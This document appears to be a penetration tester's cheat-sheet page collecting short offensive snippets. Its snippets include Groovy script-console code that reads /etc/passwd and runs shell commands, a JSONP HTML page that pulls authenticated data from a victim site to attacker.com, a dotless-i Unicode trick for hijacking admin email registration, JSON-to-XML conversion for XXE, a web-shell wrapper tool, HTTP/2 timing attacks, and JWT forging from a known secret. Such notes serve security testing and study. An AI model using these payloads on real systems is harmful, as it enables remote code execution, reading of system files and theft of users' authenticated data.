Comment on page

Other

Groovy Script Console
File-Read
new File("/etc/passwd").withReader('UTF-8') { reader ->
def line
    while ((line = reader.readLine()) != null) { 
        println "${line}"
    }
}
RCE
def process = "ls -lah".execute()
println "${process.text}"
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'ls -lah'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "$sout"
JsonP
Only useful if a jsonp endpoints requires authentication. A Victim at attacker.com will retrieve the data from victim.com and send its cookie along because of how jsonp works (Reference: https://www.sjoerdlangkemper.nl/2019/01/02/jsonp/).
<html>
<body>
<script>
function xct(a) {
​
alert(JSON.stringify(a));
​
}
</script>
<script src="targeturl?callback=xct"></script>
<body>
</html>
Unicode Abuse
We can use some special characters like the dotless I to abuse "toUpperCase()", registering for example an admin email address. Reference: https://eng.getwisdom.io/hacking-github-with-unicode-dotless-i/​
Json to XML
Change JSON Post requests to XML Format, sometimes this works and can be used for XXE, e.g. https://twitter.com/11xuxx/status/1250764273623629826​
HTTP/3 Clients
docker run -it 'ymuski/curl-http3' bash
curl/HTTP3.md at master · curl/curl
GitHub
Interactive Shell from Web Shell
GitHub - mxrch/webwrap: Give me a web shell, I'll give you a terminal. 🌯
GitHub
Timeless Timing Attacks against Remote Targets
​https://www.youtube.com/watch?v=Oz0NtokfbqU​
The idea is to use HTTP2 to send multiple requests in one which allows us to measure the difference, by looking at which comes back first. Repeat this a lot to get some statistical relevance.
Create JWT from Secret Key via PyJWT
import jwt
data = {"data": {"username": "xct"}}
print(jwt.encode(data, "6cb9...", algorithm="HS256"))

Tools

Next - Red Team

Cloud

Last modified 9mo ago